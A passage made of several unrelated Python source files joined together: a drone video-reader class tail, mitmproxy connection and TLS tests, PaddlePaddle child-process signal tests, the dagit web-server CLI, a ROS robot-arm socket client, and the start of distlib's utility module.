self.is_flying: self.land() if self.stream_on: self.streamoff() if self.background_frame_read is not None: self.background_frame_read.stop() if self.cap is not None: self.cap.release() host = self.address[0] del drones[host] def __del__(self): self.end() class BackgroundFrameRead: """ 
This class read frames from a VideoCapture in background. Then, just call backgroundFrameRead.frame to get the actual one. """ def __init__(self, tello, address): tello.cap = cv2.VideoCapture(address) self.cap = tello.cap if not self.cap.isOpened(): self.cap.open(address) self.grabbed, self.frame = self.cap.read() self.stopped = False def start(self): Thread(target=self.update_frame, args=()).start() return self def update_frame(self): while not self.stopped: if not self.grabbed or not self.cap.isOpened(): self.stop() else: (self.grabbed, self.frame) = self.cap.read() def stop(self): self.stopped = True
test_connections.py
import socket
import os
import threading
import ssl
import OpenSSL
import pytest
from unittest import mock

from mitmproxy import connections
from mitmproxy import exceptions
from mitmproxy.net import tcp
from mitmproxy.net.http import http1
from mitmproxy.test import tflow
from mitmproxy.test import tutils
from .net import tservers
from pathod import test


class TestClientConnection:
    """Unit tests for connections.ClientConnection."""

    def test_send(self):
        c = tflow.tclient_conn()
        c.send(b'foobar')
        c.send([b'foo', b'bar'])
        with pytest.raises(TypeError):
            c.send('string')
        with pytest.raises(TypeError):
            c.send(['string', 'not'])
        assert c.wfile.getvalue() == b'foobarfoobar'

    def test_repr(self):
        c = tflow.tclient_conn()
        assert 'address:22' in repr(c)
        assert 'ALPN' in repr(c)
        assert 'TLS' not in repr(c)

        c.alpn_proto_negotiated = None
        c.tls_established = True
        assert 'ALPN' not in repr(c)
        assert 'TLS' in repr(c)

    def test_tls_established_property(self):
        c = tflow.tclient_conn()
        c.tls_established = True
        assert c.ssl_established
        assert c.tls_established
        c.tls_established = False
        assert not c.ssl_established
        assert not c.tls_established

    def test_make_dummy(self):
        c = connections.ClientConnection.make_dummy(('foobar', 1234))
        assert c.address == ('foobar', 1234)

    def test_state(self):
        c = tflow.tclient_conn()
        assert connections.ClientConnection.from_state(c.get_state()).get_state() == \
            c.get_state()

        c2 = tflow.tclient_conn()
        c2.address = (c2.address[0], 4242)
        assert not c == c2

        c2.timestamp_start = 42
        c.set_state(c2.get_state())
        assert c.timestamp_start == 42

        c3 = c.copy()
        assert c3.get_state() != c.get_state()
        c.id = c3.id = "foo"
        assert c3.get_state() == c.get_state()

    def test_eq(self):
        c = tflow.tclient_conn()
        c2 = c.copy()
        assert c == c
        assert c != c2
        assert c != 42
        assert hash(c) != hash(c2)


class TestServerConnection:
    """Unit tests for connections.ServerConnection."""

    def test_send(self):
        c = tflow.tserver_conn()
        c.send(b'foobar')
        c.send([b'foo', b'bar'])
        with pytest.raises(TypeError):
            c.send('string')
        with pytest.raises(TypeError):
            c.send(['string', 'not'])
        assert c.wfile.getvalue() == b'foobarfoobar'

    def test_repr(self):
        c = tflow.tserver_conn()

        c.sni = 'foobar'
        c.tls_established = True
        c.alpn_proto_negotiated = b'h2'
        assert 'address:22' in repr(c)
        assert 'ALPN' in repr(c)
        assert 'TLSv1.2: foobar' in repr(c)

        c.sni = None
        c.tls_established = True
        c.alpn_proto_negotiated = None
        assert 'ALPN' not in repr(c)
        assert 'TLS' in repr(c)

        c.sni = None
        c.tls_established = False
        assert 'TLS' not in repr(c)

    def test_tls_established_property(self):
        c = tflow.tserver_conn()
        c.tls_established = True
        assert c.ssl_established
        assert c.tls_established
        c.tls_established = False
        assert not c.ssl_established
        assert not c.tls_established

    def test_make_dummy(self):
        c = connections.ServerConnection.make_dummy(('foobar', 1234))
        assert c.address == ('foobar', 1234)

    def test_simple(self):
        d = test.Daemon()
        c = connections.ServerConnection((d.IFACE, d.port))
        c.connect()
        f = tflow.tflow()
        f.server_conn = c
        f.request.path = "/p/200:da"

        # use this protocol just to assemble - not for actual sending
        c.wfile.write(http1.assemble_request(f.request))
        c.wfile.flush()

        assert http1.read_response(c.rfile, f.request, 1000)
        assert d.last_log()

        c.finish()
        d.shutdown()

    def test_terminate_error(self):
        d = test.Daemon()
        c = connections.ServerConnection((d.IFACE, d.port))
        c.connect()
        c.connection = mock.Mock()
        c.connection.recv = mock.Mock(return_value=False)
        c.connection.flush = mock.Mock(side_effect=exceptions.TcpDisconnect)
        c.finish()
        d.shutdown()

    def test_sni(self):
        c = connections.ServerConnection(('', 1234))
        # Fix: pytest.raises takes `match` (a regex), not `matches`; the old
        # keyword raised a TypeError instead of checking the message.
        with pytest.raises(ValueError, match='sni must be str, not '):
            c.establish_ssl(None, b'foobar')

    def test_state(self):
        c = tflow.tserver_conn()
        c2 = c.copy()
        assert c2.get_state() != c.get_state()
        c.id = c2.id = "foo"
        assert c2.get_state() == c.get_state()

    def test_eq(self):
        c = tflow.tserver_conn()
        c2 = c.copy()
        assert c == c
        assert c != c2
        assert c != 42
        assert hash(c) != hash(c2)


class TestClientConnectionTLS:
    """TLS handshake tests for ClientConnection."""

    @pytest.mark.parametrize("sni", [
        None,
        "example.com"
    ])
    def test_tls_with_sni(self, sni):
        address = ('127.0.0.1', 0)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind(address)
        sock.listen()
        address = sock.getsockname()

        def client_run():
            ctx = ssl.create_default_context()
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            s = socket.create_connection(address)
            s = ctx.wrap_socket(s, server_hostname=sni)
            s.send(b'foobar')
            s.shutdown(socket.SHUT_RDWR)
        threading.Thread(target=client_run).start()

        connection, client_address = sock.accept()
        c = connections.ClientConnection(connection, client_address, None)

        cert = tutils.test_data.path("mitmproxy/net/data/server.crt")
        # Fix: close the key file instead of leaking the handle.
        with open(tutils.test_data.path("mitmproxy/net/data/server.key"), "rb") as keyfile:
            key = OpenSSL.crypto.load_privatekey(
                OpenSSL.crypto.FILETYPE_PEM,
                keyfile.read())
        c.convert_to_ssl(cert, key)
        assert c.connected()
        assert c.sni == sni
        assert c.tls_established
        assert c.rfile.read(6) == b'foobar'
        c.finish()


class TestServerConnectionTLS(tservers.ServerTestBase):
    """TLS handshake tests for ServerConnection against a local test server."""
    ssl = True

    class handler(tcp.BaseHandler):
        def handle(self):
            self.finish()

    @pytest.mark.parametrize("clientcert", [
        None,
        tutils.test_data.path("mitmproxy/data/clientcert"),
        os.path.join(tutils.test_data.path("mitmproxy/data/clientcert"), "client.pem"),
    ])
    def test_tls(self, clientcert):
        c = connections.ServerConnection(("127.0.0.1", self.port))
        c.connect()
        c.establish_ssl(clientcert, "foo.com")
        assert c.connected()
        assert c.sni == "foo.com"
        assert c.tls_established
        c.close()
        c.finish()
test_imperative_signal_handler.py
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os
import sys
import signal
import unittest
import multiprocessing
import time

import paddle.compat as cpt
from paddle.fluid import core


def set_child_signal_handler(self, child_pid):
    """Register a SIGCHLD handler that surfaces child-process failures,
    chaining any previously installed callable handler."""
    core._set_process_pids(id(self), tuple([child_pid]))
    previous = signal.getsignal(signal.SIGCHLD)
    if not callable(previous):
        previous = None

    def __handler__(signum, frame):
        core._throw_error_if_process_failed()
        if previous is not None:
            previous(signum, frame)

    signal.signal(signal.SIGCHLD, __handler__)


class TestDygraphDataLoaderSingalHandler(unittest.TestCase):
    def _expect_child_failure(self, target, message):
        # Shared driver: spawn the child, install the handler, wait, and
        # require that an EnforceNotMet containing `message` was raised.
        caught = None
        try:
            child = multiprocessing.Process(target=target)
            child.start()
            set_child_signal_handler(id(self), child.pid)
            time.sleep(3)
        except core.EnforceNotMet as ex:
            self.assertIn(message, cpt.get_exception_message(ex))
            caught = ex
        self.assertIsNotNone(caught)

    def test_child_process_exit_with_error(self):
        def __test_process__():
            core._set_process_signal_handler()
            sys.exit(1)

        self._expect_child_failure(__test_process__, "FatalError")

    def test_child_process_killed_by_sigsegv(self):
        def __test_process__():
            core._set_process_signal_handler()
            os.kill(os.getpid(), signal.SIGSEGV)

        self._expect_child_failure(__test_process__, "Segmentation fault")

    def test_child_process_killed_by_sigbus(self):
        def __test_process__():
            core._set_process_signal_handler()
            os.kill(os.getpid(), signal.SIGBUS)

        self._expect_child_failure(__test_process__, "Bus error")

    def test_child_process_killed_by_sigterm(self):
        def __test_process__():
            core._set_process_signal_handler()
            time.sleep(10)

        # SIGTERM of a daemon child must NOT raise in the parent.
        test_process = multiprocessing.Process(target=__test_process__)
        test_process.daemon = True
        test_process.start()
        set_child_signal_handler(id(self), test_process.pid)
        time.sleep(1)


if __name__ == '__main__':
    unittest.main()
cli.py
import os
import sys
import threading
from contextlib import contextmanager

import click
import six
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler

from dagster import check, seven
from dagster.cli.workspace import Workspace, get_workspace_from_kwargs, workspace_target_argument
from dagster.core.instance import DagsterInstance
from dagster.core.telemetry import START_DAGIT_WEBSERVER, log_action, log_repo_stats, upload_logs
from dagster.utils import DEFAULT_WORKSPACE_YAML_FILENAME

from .app import create_app_from_workspace
from .version import __version__


def create_dagit_cli():
    """Return the click command that implements the dagit CLI."""
    return ui  # pylint: disable=no-value-for-parameter


REPO_TARGET_WARNING = 'Can only use ONE of --workspace/-w, --python-file/-f, --module-name/-m.'

DEFAULT_DAGIT_HOST = '127.0.0.1'
DEFAULT_DAGIT_PORT = 3000


@click.command(
    name='ui',
    help=(
        'Run dagit. Loads a repository or pipeline.\n\n{warning}'.format(
            warning=REPO_TARGET_WARNING
        )
        + (
            '\n\n Examples:'
            '\n\n1. dagit (works if .{default_filename} exists)'
            '\n\n2. dagit -w path/to/{default_filename}'
            '\n\n3. dagit -f path/to/file.py'
            '\n\n4. dagit -m some_module'
            '\n\n5. dagit -f path/to/file.py -a define_repo'
            '\n\n6. dagit -m some_module -a define_repo'
            '\n\n7. dagit -p 3333'
            '\n\nOptions Can also provide arguments via environment variables prefixed with DAGIT_'
            '\n\n DAGIT_PORT=3333 dagit'
        ).format(default_filename=DEFAULT_WORKSPACE_YAML_FILENAME)
    ),
)
@workspace_target_argument
@click.option(
    '--host',
    '-h',
    type=click.STRING,
    default=DEFAULT_DAGIT_HOST,
    help="Host to run server on, default is {default_host}".format(default_host=DEFAULT_DAGIT_HOST),
)
@click.option(
    '--port',
    '-p',
    type=click.INT,
    help="Port to run server on, default is {default_port}".format(default_port=DEFAULT_DAGIT_PORT),
)
@click.option(
    '--path-prefix',
    '-l',
    type=click.STRING,
    default='',
    help="The path prefix where Dagit will be hosted (eg: /dagit), default is ''",
)
@click.option(
    '--storage-fallback',
    help="Base directory for dagster storage if $DAGSTER_HOME is not set",
    default=None,
    type=click.Path(),
)
@click.version_option(version=__version__, prog_name='dagit')
def ui(host, port, path_prefix, storage_fallback, **kwargs):
    """CLI entry point: resolve defaults and launch the dagit web server."""
    # add the path for the cwd so imports in dynamically loaded code work correctly
    sys.path.append(os.getcwd())

    # A missing --port means we may probe for a free one later.
    port_lookup = port is None
    if port_lookup:
        port = DEFAULT_DAGIT_PORT

    if storage_fallback is None:
        with seven.TemporaryDirectory() as storage_fallback:
            host_dagit_ui(host, port, path_prefix, storage_fallback, port_lookup, **kwargs)
    else:
        host_dagit_ui(host, port, path_prefix, storage_fallback, port_lookup, **kwargs)


def host_dagit_ui(host, port, path_prefix, storage_fallback, port_lookup=True, **kwargs):
    """Resolve the instance and workspace, then serve dagit."""
    instance = DagsterInstance.get(storage_fallback)
    workspace = get_workspace_from_kwargs(kwargs, instance)
    if not workspace:
        raise Exception('Unable to load workspace with cli_args: {}'.format(kwargs))
    return host_dagit_ui_with_workspace(instance, workspace, host, port, path_prefix, port_lookup)


def host_dagit_ui_with_workspace(instance, workspace, host, port, path_prefix, port_lookup=True):
    """Build the Flask app for `workspace` and start the web server."""
    check.inst_param(instance, 'instance', DagsterInstance)
    check.inst_param(workspace, 'workspace', Workspace)

    if len(workspace.repository_location_handles) == 1:
        repository_location_handle = workspace.repository_location_handles[0]

        # Telemetry logic needs to be updated to support multi-repo / gRPC repo locations
        # See https://github.com/dagster-io/dagster/issues/2752
        if (
            hasattr(repository_location_handle, 'repository_code_pointer_dict')
            and len(repository_location_handle.repository_code_pointer_dict) == 1
        ):
            pointer = next(iter(repository_location_handle.repository_code_pointer_dict.values()))
            from dagster.core.definitions.reconstructable import ReconstructableRepository

            recon_repo = ReconstructableRepository(pointer)
            log_repo_stats(instance=instance, repo=recon_repo, source='dagit')

    app = create_app_from_workspace(workspace, instance, path_prefix)
    start_server(instance, host, port, path_prefix, app, port_lookup)


@contextmanager
def uploading_logging_thread():
    """Run the telemetry log uploader on a background thread for the server's lifetime."""
    stop_event = threading.Event()
    logging_thread = threading.Thread(target=upload_logs, args=(stop_event,))
    try:
        logging_thread.start()
        yield
    finally:
        stop_event.set()
        logging_thread.join()


def start_server(instance, host, port, path_prefix, app, port_lookup, port_lookup_attempts=0):
    """Serve `app`, retrying on successive ports when the chosen one is taken."""
    server = pywsgi.WSGIServer((host, port), app, handler_class=WebSocketHandler)

    print(  # pylint: disable=print-call
        'Serving on http://{host}:{port}{path_prefix} in process {pid}'.format(
            host=host, port=port, path_prefix=path_prefix, pid=os.getpid()
        )
    )

    log_action(instance, START_DAGIT_WEBSERVER)
    with uploading_logging_thread():
        try:
            server.serve_forever()
        except OSError as os_error:
            if 'Address already in use' not in str(os_error):
                raise os_error

            # Only prompt on the first collision; subsequent retries are automatic.
            should_retry = port_lookup and (
                port_lookup_attempts > 0
                or click.confirm(
                    (
                        'Another process on your machine is already listening on port {port}. '
                        'Would you like to run the app at another port instead?'
                    ).format(port=port)
                )
            )
            if should_retry:
                port_lookup_attempts += 1
                start_server(
                    instance,
                    host,
                    port + port_lookup_attempts,
                    path_prefix,
                    app,
                    True,
                    port_lookup_attempts,
                )
            else:
                six.raise_from(
                    Exception(
                        (
                            'Another process on your machine is already listening on port {port}. '
                            'It is possible that you have another instance of dagit '
                            'running somewhere using the same port. Or it could be another '
                            'random process. Either kill that process or use the -p option to '
                            'select another port.'
                        ).format(port=port)
                    ),
                    os_error,
                )


cli = create_dagit_cli()


def main():
    # click magic
    cli(auto_envvar_prefix='DAGIT')  # pylint:disable=E1120
Hiwin_RT605_ArmCommand_Socket_20190627184149.py
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
# multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum

Socket = 0
data = '0'  # initial value of the data to transmit
Arm_feedback = 1  # assume the arm is busy at startup
NAME = 'socket_server'
arm_mode_flag = False


# ------------ pose container -------------
class point():
    """Cartesian pose: position (x, y, z) and orientation (pitch, roll, yaw)."""

    def __init__(self, x, y, z, pitch, roll, yaw):
        self.x = x
        self.y = y
        self.z = z
        self.pitch = pitch
        self.roll = roll
        self.yaw = yaw


pos = point(0.0, 36.8, 11.35, -90.0, 0.0, 0.0)


# ------------ socket command container -------------
class socket_data():
    """Holds the pending arm command: gripper, velocity, mode flags, action."""

    def __init__(self, grip, setvel, ra, delay, setboth, action, Speedmode):
        self.grip = grip
        self.setvel = setvel
        self.ra = ra
        self.delay = delay
        self.setboth = setboth
        self.action = action
        self.Speedmode = Speedmode


socket_cmd = socket_data(0, 0.0, 0, 0, 0, 0, 0)


# ----------- switch/case emulation -----------
class switch(object):
    """C-style switch emulation with fall-through, used via `for case in switch(v)`."""

    def __init__(self, value):
        self.value = value
        self.fall = False

    def __iter__(self):
        """Return the match method once, then stop."""
        yield self.match
        # Fix: `raise StopIteration` inside a generator is a RuntimeError
        # under PEP 479 (Python 3.7+); a plain return ends the generator.
        return

    def match(self, *args):
        """Indicate whether or not to enter a case suite."""
        if self.fall or not args:
            return True
        elif self.value in args:
            self.fall = True
            return True
        else:
            return False


# ----------- arm state fed back by the client -----------
class StateFeedback():
    """Latest arm state and send-confirmation flag reported by the arm."""

    def __init__(self, ArmState, SentFlag):
        self.ArmState = ArmState
        self.SentFlag = SentFlag


state_feedback = StateFeedback(0, 0)


def point_data(x, y, z, pitch, roll, yaw):
    """Store a pose received from the strategy (planner) side."""
    pos.x = x
    pos.y = y
    pos.z = z
    pos.pitch = pitch
    pos.roll = roll
    pos.yaw = yaw


# ---------- arm mode ----------
def Arm_Mode(action, grip, ra, setvel, setboth):
    """Store arm-mode data from the strategy side and dispatch the command."""
    global arm_mode_flag
    socket_cmd.action = action
    socket_cmd.grip = grip
    socket_cmd.ra = ra
    socket_cmd.setvel = setvel
    socket_cmd.setboth = setboth
    arm_mode_flag = True
    Socket_command()


# ---------- arm speed mode ----------
def Speed_Mode(speedmode):
    """Store the arm speed mode received from the strategy side."""
    global speed_mode_flag
    socket_cmd.Speedmode = speedmode


def socket_talker():
    """ROS node: publish the current arm state on the 'chatter' topic at 10 Hz."""
    pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
    rospy.init_node(NAME)
    rate = rospy.Rate(10)  # 10hz
    print("Ready to connect")
    while not rospy.is_shutdown():
        state = Int32MultiArray()
        state.data = [state_feedback.ArmState, state_feedback.SentFlag]
        pub.publish(state)
        rate.sleep()


# ---------- build and send arm command packets over the socket ----------
def Socket_command():
    """Translate the pending socket_cmd into a TCP packet and send it."""
    global Socket, arm_mode_flag, data
    if arm_mode_flag != True:
        return
    arm_mode_flag = False
    # NOTE(review): the inner `for case in switch(...)` shadows the outer
    # loop variable `case`; behavior is unchanged but it is fragile.
    for case in switch(socket_cmd.action):
        # ------- PtP mode -------
        if case(Taskcmd.Action_Type.PtoP):
            for case in switch(socket_cmd.setboth):
                if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                    data = TCP.SetPtoP(socket_cmd.grip, Taskcmd.RA.ABS, Taskcmd.Ctrl_Mode.CTRL_POS,
                                       pos.x, pos.y, pos.z, pos.pitch, pos.roll, pos.yaw,
                                       socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                    data = TCP.SetPtoP(socket_cmd.grip, Taskcmd.RA.ABS, Taskcmd.Ctrl_Mode.CTRL_EULER,
                                       pos.x, pos.y, pos.z, pos.pitch, pos.roll, pos.yaw,
                                       socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                    data = TCP.SetPtoP(socket_cmd.grip, Taskcmd.RA.ABS, Taskcmd.Ctrl_Mode.CTRL_BOTH,
                                       pos.x, pos.y, pos.z, pos.pitch, pos.roll, pos.yaw,
                                       socket_cmd.setvel)
                    break
            break
        # ------- Line mode -------
        if case(Taskcmd.Action_Type.Line):
            for case in switch(socket_cmd.setboth):
                if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                    data = TCP.SetLine(socket_cmd.grip, Taskcmd.RA.ABS, Taskcmd.Ctrl_Mode.CTRL_POS,
                                       pos.x, pos.y, pos.z, pos.pitch, pos.roll, pos.yaw,
                                       socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                    data = TCP.SetLine(socket_cmd.grip, Taskcmd.RA.ABS, Taskcmd.Ctrl_Mode.CTRL_EULER,
                                       pos.x, pos.y, pos.z, pos.pitch, pos.roll, pos.yaw,
                                       socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                    data = TCP.SetLine(socket_cmd.grip, Taskcmd.RA.ABS, Taskcmd.Ctrl_Mode.CTRL_BOTH,
                                       pos.x, pos.y, pos.z, pos.pitch, pos.roll, pos.yaw,
                                       socket_cmd.setvel)
                    break
            break
        # ------- set arm velocity -------
        if case(Taskcmd.Action_Type.SetVel):
            data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
            break
        # ------- set arm delay time -------
        if case(Taskcmd.Action_Type.Delay):
            data = TCP.SetDelay(socket_cmd.grip, 0)
            break
        # ------- set arm fast/safe speed mode -------
        if case(Taskcmd.Action_Type.Mode):
            data = TCP.Set_SpeedMode(socket_cmd.grip, socket_cmd.Speedmode)
            break
    socket_cmd.action = 6  # reset to the idle/default mode
    print(data)
    print("Socket:", Socket)
    Socket.send(data.encode('utf-8'))  # send over the socket as UTF-8


# ----------- socket client -----------
def socket_client():
    """Connect to the arm controller and poll its state feedback until shutdown."""
    global Socket
    try:
        Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        Socket.connect(('192.168.0.1', 8080))  # iclab 5 & iclab hiwin
        # s.connect(('192.168.1.102', 8080))  # iclab computer
        print('Connection has been successful')
    except socket.error as msg:
        print(msg)
        sys.exit(1)
    print(Socket.recv(1024))
    while True:
        feedback_str = Socket.recv(1024)  # arm sends its state
        # feedback_str[2] is the ASCII code of the state character.
        if str(feedback_str[2]) == '48':  # '0': arm is Ready for the next motion command
            state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':  # '1': arm is busy, cannot take a new command
            state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':  # '6': strategy finished
            state_feedback.ArmState = 6
            print("shutdown")
        # send-confirmation flag
        if str(feedback_str[4]) == '48':  # '0': false
            state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':  # '1': true
            state_feedback.SentFlag = 1
        if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
            break
    rospy.on_shutdown(myhook)
    Socket.close()


def myhook():
    print("shutdown time!")


if __name__ == '__main__':
    socket_cmd.action = 6  # reset to the idle/default mode
    # run the socket client on its own thread
    t = threading.Thread(target=socket_client)
    t.start()
    try:
        socket_talker()
    except rospy.ROSInterruptException:
        pass
    t.join()
util.py
# # Copyright (C) 2012-2013 The Python Software Foundation. # See LICENSE.txt and CONTRIBUTORS.txt. # import codecs from collections import deque import contextlib import csv from glob import iglob as std_iglob import io import json import logging import os import py_compile import re import shutil import socket import ssl import subprocess import sys import tarfile import tempfile try: import threading except ImportError: import dummy_threading as threading import time from . import DistlibException from .compat import (string_types, text_type, shutil, raw_input, StringIO, cache_from_source, urlopen, httplib, xmlrpclib, splittype, HTTPHandler, HTTPSHandler as BaseHTTPSHandler, BaseConfigurator, valid_ident, Container, configparser, URLError, match_hostname, CertificateError, ZipFile) logger = logging.getLogger(__name__) # # Requirement parsing code for name + optional constraints + optional extras # # e.g. 'foo >= 1.2, < 2.0 [bar, baz]' # # The regex can seem a bit hairy, so we build it up out of smaller pieces # which are manageable. # COMMA = r'\s*,\s*' COMMA_RE = re.compile(COMMA) IDENT = r'(\w|[.-])+' EXTRA_IDENT = r'(\*|:(\*|\w+):|' + IDENT + ')' VERSPEC = IDENT + r'\*?' 
RELOP = '([<>=!~]=)|[<>]' # # The first relop is optional - if absent, will be taken as '~=' # BARE_CONSTRAINTS = ('(' + RELOP + r')?\s*(' + VERSPEC + ')(' + COMMA + '(' + RELOP + r')\s*(' + VERSPEC + '))*') DIRECT_REF = '(from\s+(?P<diref>.*))' # # Either the bare constraints or the bare constraints in parentheses # CONSTRAINTS = (r'\(\s*(?P<c1>' + BARE_CONSTRAINTS + '|' + DIRECT_REF + r')\s*\)|(?P<c2>' + BARE_CONSTRAINTS + '\s*)') EXTRA_LIST = EXTRA_IDENT + '(' + COMMA + EXTRA_IDENT + ')*' EXTRAS = r'\[\s*(?P<ex>' + EXTRA_LIST + r')?\s*\]' REQUIREMENT = ('(?P<dn>' + IDENT + r')\s*(' + EXTRAS + r'\s*)?(\s*' + CONSTRAINTS + ')?$') REQUIREMENT_RE = re.compile(REQUIREMENT) # # Used to scan through the constraints # RELOP_IDENT = '(?P<op>' + RELOP + r')\s*(?P<vn>' + VERSPEC + ')' RELOP_IDENT_RE = re.compile(RELOP_IDENT) def parse_requirement(s): def get_constraint(m): d = m.groupdict() return d['op'], d['vn'] result = None m = REQUIREMENT_RE.match(s) if m: d = m.groupdict() name = d['dn'] cons = d['c1'] or d['c2'] if not d['diref']: url = None else: # direct reference cons = None url = d['diref'].strip() if not cons: cons = None constr = '' rs = d['dn'] else: if cons[0] not in '<>!=': cons = '~=' + cons iterator = RELOP_IDENT_RE.finditer(cons) cons = [get_constraint(m) for m in iterator] rs = '%s (%s)' % (name, ', '.join(['%s %s' % con for con in cons])) if not d['ex']: extras = None else: extras = COMMA_RE.split(d['ex']) result = Container(name=name, constraints=cons, extras=extras, requirement=rs, source=s, url=url) return result def get_resources_dests(resources_root, rules): """Find destinations for resources files""" def get_rel_path(base, path): # normalizes and returns a lstripped-/-separated path base = base.replace(os.path.sep, '/') path = path.replace(os.path.sep, '/') assert path.startswith(base) return path[len(base):].lstrip('/') destinations = {} for base, suffix, dest in rules: prefix = os.path.join(resources_root, base) for abs_base in iglob(prefix): 
abs_glob = os.path.join(abs_base, suffix) for abs_path in iglob(abs_glob): resource_file = get_rel_path(resources_root, abs_path) if dest is None: # remove the entry if it was here destinations.pop(resource_file, None) else: rel_path = get_rel_path(abs_base, abs_path) rel_dest = dest.replace(os.path.sep, '/').rstrip('/') destinations[resource_file] = rel_dest + '/' + rel_path return destinations def in_venv(): if hasattr(sys, 'real_prefix'): # virtualenv venvs result = True else: # PEP 405 venvs result = sys.prefix != getattr(sys, 'base_prefix', sys.prefix) return result def get_executable(): if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__' in os.environ): result = os.environ['__PYVENV_LAUNCHER__'] else: result = sys.executable return result def proceed(prompt, allowed_chars, error_prompt=None, default=None): p = prompt while True: s = raw_input(p) p = prompt if not s and default: s = default if s: c = s[0].lower() if c in allowed_chars: break if error_prompt: p = '%c: %s\n%s' % (c, error_prompt, prompt) return c def extract_by_key(d, keys): if isinstance(keys, string_types): keys = keys.split() result = {} for key in keys: if key in d: result[key] = d[key] return result def read_exports(stream): if sys.version_info[0] >= 3: # needs to be a text stream stream = codecs.getreader('utf-8')(stream) # Try to load as JSON, falling back on legacy format data = stream.read() stream = StringIO(data) try: data = json.load(stream) result = data['exports'] for group, entries in result.items(): for k, v in entries.items(): s = '%s = %s' % (k, v) entry = get_export_entry(s) assert entry is not None entries[k] = entry return result except Exception: stream.seek(0, 0) cp = configparser.ConfigParser() if hasattr(cp, 'read_file'): cp.read_file(stream) else: cp.readfp(stream) result = {} for key in cp.sections(): result[key] = entries = {} for name, value in cp.items(key): s = '%s = %s' % (name, value) entry = get_export_entry(s) assert entry is not None # entry.dist = self 
entries[name] = entry return result def write_exports(exports, stream): if sys.version_info[0] >= 3: # needs to be a text stream stream = codecs.getwriter('utf-8')(stream) cp = configparser.ConfigParser() for k, v in exports.items(): # TODO check k, v for valid values cp.add_section(k) for entry in v.values(): if entry.suffix is None: s = entry.prefix else: s = '%s:%s' % (entry.prefix, entry.suffix) if entry.flags: s = '%s [%s]' % (s, ', '.join(entry.flags)) cp.set(k, entry.name, s) cp.write(stream) @contextlib.contextmanager def tempdir(): td = tempfile.mkdtemp() try: yield td finally: shutil.rmtree(td) @contextlib.contextmanager def chdir(d): cwd = os.getcwd() try: os.chdir(d) yield finally: os.chdir(cwd) @contextlib.contextmanager def socket_timeout(seconds=15): cto = socket.getdefaulttimeout() try: socket.setdefaulttimeout(seconds) yield finally: socket.setdefaulttimeout(cto) class cached_property(object): def __init__(self, func): self.func = func # for attr in ('__name__', '__module__', '__doc__'): # setattr(self, attr, getattr(func, attr, None)) def __get__(self, obj, cls=None): if obj is None: return self value = self.func(obj) object.__setattr__(obj, self.func.__name__, value) # obj.__dict__[self.func.__name__] = value = self.func(obj) return value def convert_path(pathname): """Return 'pathname' as a name that will work on the native filesystem. The path is split on '/' and put back together again using the current directory separator. Needed because filenames in the setup script are always supplied in Unix style, and have to be converted to the local convention before we can actually use them in the filesystem. Raises ValueError on non-Unix-ish systems if 'pathname' either starts or ends with a slash. 
""" if os.sep == '/': return pathname if not pathname: return pathname if pathname[0] == '/': raise ValueError("path '%s' cannot be absolute" % pathname) if pathname[-1] == '/': raise ValueError("path '%s' cannot end with '/'" % pathname) paths = pathname.split('/') while os.curdir in paths: paths.remove(os.curdir) if not paths: return os.curdir return os.path.join(*paths) class FileOperator(object): def __init__(self, dry_run=False): self.dry_run = dry_run self.ensured = set() self._init_record() def _init_record(self): self.record = False self.files_written = set() self.dirs_created = set() def record_as_written(self, path): if self.record: self.files_written.add(path) def newer(self, source, target): """Tell if the target is newer than the source. Returns true if 'source' exists and is more recently modified than 'target', or if 'source' exists and 'target' doesn't. Returns false if both exist and 'target' is the same age or younger than 'source'. Raise PackagingFileError if 'source' does not exist. Note that this test is not very accurate: files created in the same second will have the same "age". """ if not os.path.exists(source): raise DistlibException("file '%r' does not exist" % os.path.abspath(source)) if not os.path.exists(target): return True return os.stat(source).st_mtime > os.stat(target).st_mtime def copy_file(self, infile, outfile, check=True): """Copy a file respecting dry-run and force flags. 
